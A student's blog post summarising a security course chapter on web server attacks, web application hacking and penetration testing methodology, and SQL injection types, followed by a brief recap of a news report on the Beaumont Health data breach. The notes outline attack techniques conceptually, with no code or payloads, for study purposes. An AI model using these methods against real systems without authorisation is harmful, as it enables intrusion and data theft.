Friday, April 17, 2020

Blog 12

This chapter was about web servers, web applications and SQL injections.

Web Servers

  • A web server is a computer used to store and distribute web pages to clients.
  • Web servers have many vulnerabilities.
  • There are different types of server attacks.
    • Website defacement: A website is vandalized or defaced. The hacker could also change the site's content.
    • Directory traversal: This is when hacker tries to get into other folders and directories on a web server that are restricted.
    • Cross-site scripting: Takes advantage of website's scripting defects. An attacker can alter the XSS to send malicious code to a user. 
 Web Applications
  •  A web application is software that has been installed on top of a web server.
  • They process, store, and distribute information.
  • Upload bombing uploads a lot of files onto a server to crash it.
  • Poison null byte attack sends special characters to the script
  •  Cookies are a vulnerability as well
  • Web application hacking methodology
    • Start with footprinting the web infrastructure. 
      • Whois lookup
      • DNS interrogation
      • Port Scanning
    • Next scan for vulnerabilities using a vulnerability scanner
    • Begin attacks to target those vulnerabilities, or even do a DOS or DDOS attack.
    • Analyze web applications
      • Identify entry point for user input.
      • Identify which applications are provided to the client.
    • Attack authentication mechanism by targeting implementation and errors in web applications.
    • Attack authorization scheme
      • Attackers modify input fields in http requests. 
      • Query String
      • HTTP header
    • Attack session management mechanisms
      •  Session token prediction
      • Session Hijacking
      • Man-in-the-middle attacks 
    • Perform injection attacks
      • Injects malicious code into an input string to modify a database or alter a website.
      • Code injection when the hacker inputs code that is executed by the application.
      • Command injection when the hacker inputs code that alters the functionality of execution commands.
    • Attack flaws in application logic
    • Attack database connectivity
    • Attack the web client application
  •  Penetration Testing Methodology
    • Information gathering about target system or network
      • Active and cached web pages
      • Error Messages
      • Entry points 
      • Web applications
    •  Check configuration settings
    • Complete application configuration management 
      • Use CGI scanners
      • Review web server content, configuration files, and log files.
      • Test for hidden file extensions and check locations of old backup and configuration files.
      • Administrative Interfaces
      • Review HTML and source code. Watch for comments and coding tags.
    • Authentication Testing
      • Password reset
      • Session timeout
      • Browser cache
      • Password error or lockout feature
    • Session Management Testing
      • Cookies
      • Session fixations
      • Exposed session variables
      • Cross-site forgery requests.
    • Denial-of-service testing
      • Account lockouts
      • Buffer overflows
      • User object allocation
    • Data validation
      • Input vulnerabilities
      • Character type or count
    • Authorization testing
    • Document all findings during the test
SQL Injections
  •  A language that was designed to request data from a database.
  • SQL injection is an attack that attacks a web application by manipulating SQL statements entered into a web page.
  • They target flaws in web applications.
  • They exploit input vulnerabilities.
  • They use existing code.
  • SQL Injection Methodology
    • Information Gathering
      • See if web application is connected to a database server
      • Inject codes into fields to generate error messages
    •  Test for SQL injection vulnerabilities. 
    • Launch an SQL injection attack
      • In-band: One communication channel to attack and gather results.
      • Error-based: Depends on error messages
      • Union-based: Uses the UNION operator to combine results of multiple SELECT statements into one result.
      • Blind SQL: You receive true or false results.
      • Content-based blind SQL: Uses a query to alter the HTTP response differently for a true or false answer.
      • Time-based blind SQL: Alters the HTTP response time for a true or false answer.
      • Advanced SQL Injection: Database, table, and column enumeration. Password grabbing.

Article

The article I read was about a security breach at Beaumont Health. 112,000 people's information was leaked nearly a year ago. Details leaked included names, dates of birth, social security numbers, medical conditions, bank account information, and drivers licenses. Doesn't say they caught the hacker but they have implemented better training and education for their employees.


 https://www.freep.com/story/news/health/2020/04/17/beaumont-health-security-breach-personal-information/5155716002/




























Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)